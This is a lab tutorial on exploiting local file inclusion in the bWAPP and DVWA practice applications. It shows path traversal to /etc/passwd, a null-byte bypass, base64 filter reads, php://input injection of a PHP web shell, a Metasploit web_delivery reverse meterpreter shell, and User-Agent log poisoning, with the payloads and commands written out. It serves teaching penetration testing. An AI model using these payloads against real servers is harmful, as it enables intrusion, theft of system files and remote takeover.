The main aim of writing this article is to share the idea of making an attack on a web server using various techniques when the server is suffering from file inclusion vulnerability. As we all are aware of LFI vulnerability which allows the user to include a file through URL in the browser. In this article I have used two different platform bWAPP and DVWA which contains file inclusion vulnerability and through which I have performed LFI attack in FOUR different ways.
Basic local file inclusion
Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then click on hack.
Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL. To perform basic attacks manipulate
http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.1.101/bWAPP/flfi.php?language=/etc/passwd
In basic LFI attack we can directly read the content of a file from its directories using (../) or simply (/), now if you will notice the given below screenshot you will find that I have access the password file when the above URL is executed in the browser.
In some scenario the above basic local file inclusion attack may not work due to high security level. From below image you can observe now that I got fail to read the password file when executing the same path in URL. So when we face such kind of problem then go for NULL BYTE attack.
Now turn on burp suite to capture the browser request then select proxy tab and start intercept. Do not forget to set browser proxy while making use of burp suite
Now inside burp suite send the intercepted data into repeater.
Inside repeater you can do analysis of sent request and response generated by it. From screenshot it will be clear that /etc/passwd is not working and I am not able to read the password file.
From following screenshot you can see I had forward the request by adding null character (%00) at the end of directory /etc/passwd%00 and click on go tab. Then on the right sight of window the password file get open as response.
Now there is another way to exploit LFI when the security level is high and you are unable to view the PHP file content, and then use the following PHP function.
Here from the screenshot you can see the content of password file is encoded into base64; copy the whole encoded text.
I am using hackbar which a Firefox plugin to decode above copied text.
Now a pop-up box will get open past the copied encoded text inside it and click on ok
From the given screenshot you can view the result and read the content of password file.
Using PHP input function we will execute injected PHP code to exploit LFI vulnerability. With the help of hackbar I am going to perform this task in which first we need to load the URL of the targeted web page as you can see in the given screenshot.
Now manipulate above URL using PHP input function
Then select the check box to enable Post data which will forward the post request and add cmd comment in given text area<?php system($_GET[‘cmd’]); ?>as shown in following screenshot, finally click on execute.
This will show directories of victim PC.
Now time to connect the victim through reverse connection; open terminal in kali Linux and type msfconsole to start metasploit framework.
Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window
Paste above copied PHP code inside the URL as shown in the image and execute it.
When above URL get execute the attacker got victim’s meterpreter session inside the metasploit.
msf exploit (web_delivery)>session –I 1
If the server is outdated then to exploit it through LFI we can include proc/self/environ file that stores User_Agent where we will place our PHP code for executing CMD command.
Now start burp suite and capture the browser request and send the fetch data into repeater.
Add cmd comment <?php system($_GET[‘cmd’]); ?> inside user_Agent and send the request with GET parameter 192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id as shown in the below image. On the right side of window you can see the highlight result as response.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here